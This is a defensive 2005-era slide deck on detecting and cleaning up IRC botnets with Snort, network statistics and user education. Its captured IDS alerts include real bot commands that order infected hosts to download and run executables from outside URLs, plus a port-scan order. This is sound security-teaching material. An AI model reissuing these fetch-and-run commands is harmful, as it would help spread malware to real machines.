8/6/2019 Spot the Bot
1/36
Spot the Bot:
IRC Bot Detection and
Remediation
Karl F. Lutzen
Systems Security AnalystUMR Information Systems Security
8/6/2019 Spot the Bot
2/36
Agenda
Bot Basics
Detection Methods
Remediation
Risk Mitigation
Summary
8/6/2019 Spot the Bot
3/36
Bots/Zombies/Drones
Call them anything you want but they
all describe the same thing: Trouble
Botnets Today: Fun
Malicious intent
Profitable
8/6/2019 Spot the Bot
4/36
Dutch Botnet Bigger Than Expected
http://www.governmententerprise.com/news/172303265
October 21, 2005
Dutch prosecutors who last month arrested a trio ofyoung men for creating a large botnet allegedly used
to extort a U.S. company, steal identities, anddistribute spyware now say they bagged bigger prey:a botnet of 1.5 million machines.
The three suspects, ages 19, 22, and 27, werearrested Oct. 6 on charges of threatening a U.S. firm
with a denial-of-service (DoS) attack afterAmsterdam-based Internet service provider XS4ALLnotified authorities of unusual activity on its network.
8/6/2019 Spot the Bot
5/36
Bots and Botnets - 1
A Bot is a remote control program loadedonto unsuspecting hosts for various
purposes, usually malicious.
TheB
ot owner has full control of whathe/she wishes to upload onto the
compromised system and what it can do.
A group ofBots under a single owner (bot
herder) is a Botnet (bot herd)
8/6/2019 Spot the Bot
6/36
Bots and Botnets 2
Bots are spread as malicious payloads usingany number of attack vectors:
Worms
EmailViruses
Phishing
Infected files Fileshares/P2P
Direct attack of vulnerabilities
Enticement via Web/Instant Messages
(This is cool! Click Me)
8/6/2019 Spot the Bot
7/36
Bots and Botnets - 3
Bots are usually controlled via IRC byblackhats/interested parties of all ages
The Botnet owner simply sends
commands to the IRC
C
hannel and theBots do what they are told.
Circumvent firewalls and network
address translators infected host
does the communication out to the
control
8/6/2019 Spot the Bot
8/36
Bots and Botnets 4
Botnets can steal: Personal or businessinformation, software license keys, etc.
Botnets can launch any number of
attacks: DoS, DDoS, Send Spam,Launch Worms, Spread Pop-up Ads.
Anything the Bot owner chooses to do,
the botted systems will dutifully carry
out.
8/6/2019 Spot the Bot
9/36
Bot Fighting on Slashdot
Microsoft's Vigilante Investigation of Zombies
Posted by Zonk on Friday October 28, @03:55PMfrom the busting-undead-skull dept.
Morgalyn writes "According to an article at InformationWeek, Microsoft has decided to fight zombie-
launched spam in their own way. In conjunction withthe FTC and consumer rights groups, Microsoft set upa clean computer and then infected it. They monitoredthe 'zombie' over the course of 20 days - 'In those 20days, this one computer received 5 million connectionrequests from spammers, and sent 18 million spammessages'. This whole operation has led to the(partial) identification of 13 different spamminggroups, some of which reside in the US and may be
prosecuted under the CAN-SPAM act."
8/6/2019 Spot the Bot
10/36
Bot Detection Setup
Policies First! Install Network statistics monitoring
Netflow
Sflow
Firewall w/logging
Others
IDS Sensors such as Snort
8/6/2019 Spot the Bot
11/36
Network Statistics
Determine unusual traffic patterns Find out all systems talking to a specific
host
Verify firewall rules are working or notDownside:
Hard to read
Generates a huge amount of data Only reactive
8/6/2019 Spot the Bot
12/36
IDS with Snort
Open source software Runs on Linux, Windows and OSX
Thousands of detection rules available
Can be coupled with iptables for instantquarantine
Database alert management
Graphic consoles available
Should be located at your egress point(s)
http://www.snort.org/
8/6/2019 Spot the Bot
13/36
Rule Sets
Select only a specific group of bot rulesAlso get the Bleeding Edge Snort rules
http://www.bleeding-snort.org/
Dont get carried away!
8/6/2019 Spot the Bot
14/36
Rules To Choose
Get the rules that detect IRC
commandson both standard and non standard IRCports:
NICK
JOIN PRIVMSG
Use both the standard Snort and Bleeding
snort rules that cover these commands UMR does not use any custom rules to
detect bots as these basic rules really dothe job
8/6/2019 Spot the Bot
15/36
8/6/2019 Spot the Bot
16/36
Spot the Bot Unusual Names
NICK or USER names:USA|08039035 x445004
XP-7546411 [o]619531707
[urx]47517 wxkrihazqydm[worm3]8454428 [XkzQ]-31244
The key here is that unique names are
required in a IRC channel, thus bots
use random names
8/6/2019 Spot the Bot
17/36
Unusual Name Sample 1
#(6 - 1326751) [2005-02-15 15:52:34] [snort/3856] BLEEDING-EDGE IRC - Nickchange on non-std port
IPv4: 131.151.xxx.yyy -> 69.31.76.179
hlen=5 TOS=32 dlen=58 ID=30 flags=0 offset=0 TTL=128 chksum=23670
TCP: port=1032 -> dport: 3994 flags=***AP*** seq=3157605320
ack=2395385288 off=5 res=0 win=8704 urp=0 chksum=11320
Payload: length = 18
000 : 4E 49 43 4B 20 5B 58 6B 7A 51 5D 2D 33 31 32 34 NICK[XkzQ]-3124
010 : 34 0A 4.
8/6/2019 Spot the Bot
18/36
Unusual Name Sample 2
#(6 - 1885480) [2005-03-06 17:51:24] [snort/2000345] BLEEDING-EDGE IRC- Nick change on non-std port
IPv4: 131.151.xxx.yyy -> 134.36.198.28
hlen=5 TOS=32 dlen=96 ID=36715 flags=0 offset=0 TTL=128chksum=5416
TCP: port=3938 -> dport: 8080 flags=***AP*** seq=4008201724ack=92744897 off=5 res=0 win=64240 urp=0 chksum=2747
Payload: length = 56
000 : 4E 49 43 4B 20 5B 77 6F 72 6D 33 5D 38 34 35 34 NICK[worm3]8454
010 : 34 32 38 0D 0A 55 53 45 52 20 75 78 71 69 6B 74 428..USERuxqikt
020 : 6D 66 20 30 20 30 20 3A 5B 77 6F 72 6D 33 5D 38 mf 0 0 :[worm3]8
030 : 34 35 34 34 32 38 0D 0A 454428..
8/6/2019 Spot the Bot
19/36
8/6/2019 Spot the Bot
20/36
Spot the Bot Channel names
Look for odd JOIN commands:#ev1ls x #worm3
#M0b3l1 #a,#b,#c
#port1 llck #x# lmao#.a #.dr0nz
Channel names are a little tricky asnormal names can be very similar.Recommend using IRC to get abaseline.
8/6/2019 Spot the Bot
21/36
Channel Names
#(14 - 1584355) [2005-10-25 00:00:34] [snort/2000348] BLEEDING-EDGEATTACK RESPONSE IRC - Channel JOIN on non-std port
IPv4: 131.151.xxx.yyy -> 69.64.51.161
hlen=5 TOS=0 dlen=54 ID=28371 flags=0 offset=0 TTL=128chksum=55367
TCP: port=4321 -> dport: 1231 flags=***AP*** seq=2096338814
ack=2490835872 off=5 res=0 win=17116 urp=0 chksum=49459
Payload: length = 14
000 : 4A 4F 49 4E 20 23 45 76 31 6C 73 20 78 0A JOIN #Ev1ls x.
8/6/2019 Spot the Bot
22/36
Channel Names
#(6 - 5795325) [2005-05-12 00:41:08] [snort/2000348] BLEEDING-EDGE IRC- Channel JOIN on non-std port
IPv4: 131.151.xxx.yyy -> 220.85.13.93
hlen=5 TOS=0 dlen=55 ID=17572 flags=0 offset=0 TTL=127chksum=47920
TCP: port=2993 -> dport: 4367 flags=***AP*** seq=1143137794
ack=1716133218 off=5 res=0 win=17392 urp=0 chksum=29328
Payload: length = 15
000 : 4A 4F 49 4E 20 23 78 23 20 6C 6D 61 6F 0D 0A JOIN #x# lmao..
8/6/2019 Spot the Bot
23/36
Spot the Bot - PRIVMSG
Download instructions Scanning instructions
Exploited host information
Personal information (license keys)
Warning:
Private messages contain private
conversations, downloads, etc.
Use with extreme caution
8/6/2019 Spot the Bot
24/36
Spot the Bot - PRIVMSG
#(6 - 1885569) [2005-03-06 17:52:35] [snort/2000347] BLEEDING-EDGE IRC- Private message on non-std port
IPv4: 131.151.xxx.yyy -> 193.10.218.172
hlen=5 TOS=32 dlen=156 ID=35717 flags=0 offset=0 TTL=128chksum=51933
TCP: port=2123 -> dport: 8080 flags=***AP*** seq=1876389772
ack=2284567773 off=5 res=0 win=64885 urp=0 chksum=48995
Payload: length = 116
000 : 50 52 49 56 4D 53 47 20 23 6C 6C 20 3A 5B 44 4F PRIVMSG #ll :[DO
010 : 57 4E 4C 4F 41 44 5D 3A 20 44 6F 77 6E 6C 6F 61 WNLOAD]: Downloa
020 : 64 69 6E 67 20 55 52 4C 3A 20 68 74 74 70 3A 2F ding URL: http:/
030 : 2F 77 77 77 2E 61 6E 67 65 6C 66 69 72 65 2E 63 /www.angelfire.c
040 : 6F 6D 2F 77 61 33 2F 6C 6F 6C 61 2F 6D 77 2E 72 om/wa3/lola/mw.r
050 : 61 72 20 74 6F 3A 20 63 3A 5C 77 69 6E 64 6F 77 ar to: c:\window
060 : 73 5C 73 79 73 74 65 6D 33 32 5C 70 6B 2E 65 78 s\system32\pk.ex
070 : 65 2E 0D 0A e...
8/6/2019 Spot the Bot
25/36
PRIVMSG Scan Report
#(6 - 4695420) [2005-05-01 15:52:18] [snort/1] Tagged Packet
IPv4: 131.151.xxx.yyy -> 205.244.47.221
hlen=5 TOS=0 dlen=168 ID=64 flags=0 offset=0 TTL=128 chksum=50198
TCP: port=1032 -> dport: 57383 flags=***AP*** seq=631391448
ack=2791198005 off=5 res=0 win=17073 urp=0 chksum=29858
Payload: length = 128
000 : 50 52 49 56 4D 53 47 20 23 6F 20 3A 5B 53 43 41 PRIVMSG #o :[SCA
010 : 4E 5D 3A 20 53 65 71 75 65 6E 74 69 61 6C 20 50 N]: Sequential P
020 : 6F 72 74 20 53 63 61 6E 20 73 74 61 72 74 65 64 ort Scan started
030 : 20 6F 6E 20 31 33 31 2E 31 35 31 2E 30 2E 30 3A on 131.151.0.0:
040 : 31 33 39 20 77 69 74 68 20 61 20 64 65 6C 61 79 139 with a delay
050 : 20 6F 66 20 34 20 73 65 63 6F 6E 64 73 20 66 6F of 4 seconds fo060 : 72 20 30 20 6D 69 6E 75 74 65 73 20 75 73 69 6E r 0 minutes usin
070 : 67 20 32 30 30 20 74 68 72 65 61 64 73 2E 0D 0A g 200 threads...
8/6/2019 Spot the Bot
26/36
Tagged Packets
Part of the instructions within a Snortrule will generate what are called
Tagged Packets. They do not match
the full inspection for the purpose of the
rule, but they contain significant
information. Turning them off is
possible, but are very useful.
8/6/2019 Spot the Bot
27/36
User MODE: Invisible
#(14 - 1584280) [2005-10-25 00:00:27] [snort/1] Tagged Packet
IPv4: 131.151.xxx.yyy -> 69.64.51.161
hlen=5 TOS=0 dlen=83 ID=27977 flags=0 offset=0 TTL=128chksum=55732
TCP: port=4321 -> dport: 1231 flags=***AP*** seq=2096338771
ack=2490835835 off=5 res=0 win=17153 urp=0 chksum=39888Payload: length = 43
000 : 4D 4F 44 45 20 5B 58 50 2D 37 35 34 36 34 31 31 MODE [XP-7546411
010 : 5D 20 2B 69 78 0A 4D 4F 44 45 20 5B 58 50 2D 37 ] +ix.MODE [XP-7
020 : 35 34 36 34 31 31 5D 20 2B 69 0A 546411] +i.
8/6/2019 Spot the Bot
28/36
Tagged Packet Other Data
#(6 - 4404904) [2005-09-27 08:15:52] [snort/1] Tagged Packet
IPv4: 69.50.230.207 -> 131.151.xxx.yyy
hlen=5 TOS=0 dlen=133 ID=6397 flags=0 offset=0 TTL=46 chksum=63130
TCP: port=8080 -> dport: 1142 flags=***AP*** seq=536906448
ack=4216320730 off=5 res=0 win=6432 urp=0 chksum=61441
Payload: length = 93
000 : 3A 71 21 66 64 67 64 66 67 40 68 65 6C 6C 6F 2E :q!fdgdfg@hello.
010 : 6E 65 74 20 54 4F 50 49 43 20 23 77 6F 6F 74 20 net TOPIC #woot
020 : 3A 2E 64 6C 20 68 74 74 70 3A 2F 2F 68 6F 6D 65 :.dl http://home
030 : 70 61 67 65 2E 6E 74 6C 77 6F 72 6C 64 2E 63 6F page.ntlworld.co
040 : 6D 2F 74 72 61 63 65 79 33 32 2F 61 2E 65 78 65 m/tracey32/a.exe
050 : 20 61 2E 65 78 65 20 31 20 2D 73 0D 0A a.exe 1 -s..
8/6/2019 Spot the Bot
29/36
Tagged Packet Other Data
#(6 - 5795327) [2005-05-12 00:41:08] [snort/1] Tagged PacketIPv4: 220.85.13.93 -> 131.151.xxx.yyy
hlen=5 TOS=0 dlen=253 ID=21842 flags=0 offset=0 TTL=44chksum=64700
TCP: port=4367 -> dport: 2993 flags=***AP*** seq=1716133218
ack=1143137809 off=5 res=0 win=5749 urp=0 chksum=22567
Payload: length = 213
000 : 3A 73 64 79 79 78 63 6B 67 64 66 6D 21 7E 73 64 :sdyyxckgdfm!~sd
010 : 79 79 78 63 6B 67 64 40 31 33 31 2E 31 35 31 2E [email protected].
020 : xx xx xx 2E xx xx xx 20 4A 4F 49 4E 20 3A 23 78 xxx.yyy JOIN :#x
030 : 23 0D 0A 3A 53 53 48 20 33 33 32 20 73 64 79 79 #..:SSH 332 sdyy
040 : 78 63 6B 67 64 66 6D 20 23 78 23 20 3A 2E 61 69 xckgdfm #x# :.ai
050 : 6D 73 70 72 65 61 64 20 68 74 74 70 3A 2F 2F 76 mspreadhttp://v
060 : 6F 69 70 73 74 6F 72 65 2E 6E 65 74 2F 6D 79 70 oipstore.net/myp070 : 69 63 2E 63 6F 6D 0D 0A 3A 53 53 48 20 33 33 33 ic.com..:SSH 333
080 : 20 73 64 79 79 78 63 6B 67 64 66 6D 20 23 78 23 sdyyxckgdfm #x#
090 : 20 31 30 3A 33 30 20 50 4D 20 31 31 31 35 38 37 10:30 PM 111587
0a0 : 39 36 38 35 0D 0A 3A 53 53 48 20 33 36 36 20 73 9685..:SSH 366 s
0b0 : 64 79 79 78 63 6B 67 64 66 6D 20 23 78 23 20 3A dyyxckgdfm #x# :
0c0 : 45 6E 64 20 6F 66 20 2F 4E 41 4D 45 53 20 6C 69 End of /NAMES li
0d0 : 73 74 2E 0D 0A st...
8/6/2019 Spot the Bot
30/36
Thats All There Is To It!
You now have the basics to detect all bots
If you discover a group of infected hosts
talking to a single server, be sure to reportit to:
Sharing information is the best way to
combat bots.
8/6/2019 Spot the Bot
31/36
Feds Bust Suspected Bot Master
Federal authorities arrested a 20-year-old California
man on Thursday, accusing him of creating botsoftware to compromise nearly 400,000 Windowscomputers and using his control of the systems togarner more than $60,000 in profits.
Over nearly a year, Ancheta allegedly usedautomated software to infect Windows systems,advertised and sold access to the compromised PCs,and used the software to perpetrate click fraud,garnering tens of thousands of dollars in affiliate fees,according to a 58-page indictment released on
Thursday.
Security Focus, Nov 4, 2005
http://enterprisesecurity.symantec.com/content.cfm?articleid=6156
8/6/2019 Spot the Bot
32/36
Remediation
Generally will end up with someAdministrator/SYSTEM level compromise
Can be cleaned, but no guarantees
rare to return to trusted state.
Possible rootkits
www.sysinternals.com tools great tools
Hidden files Entire Internet is domain for other installs
Best Practice: Flatten/Rebuild
8/6/2019 Spot the Bot
33/36
Risk Mitigation
Educate your users. Repeatedly Web browser security settings
Do not run as Admin
Install Anti-virus software with auto Updates
Keep systems patched DONT CLICK THAT LINK!
Block ports not needed for business
Proxy servers
Install network statistics monitoring like netflow
Install IDS sensors like Snort
8/6/2019 Spot the Bot
34/36
Other Issues with Bots
Encryption Modified IRC servers
Morphing tendencies
Commands change Exploits change adapt to new
vulnerabilities
Moving targets
IRC servers change
Ports change
8/6/2019 Spot the Bot
35/36
Summary
Bots will be with us for a very long time Best practices:
Educate Users: Patches/Security
Settings/What not to do!
Install IDS and network statistics monitoring
Keep yourself up to date on the bots and
tactics
Share your findings. Inform MOREnet:[email protected]
Further questions: [email protected]
8/6/2019 Spot the Bot
36/36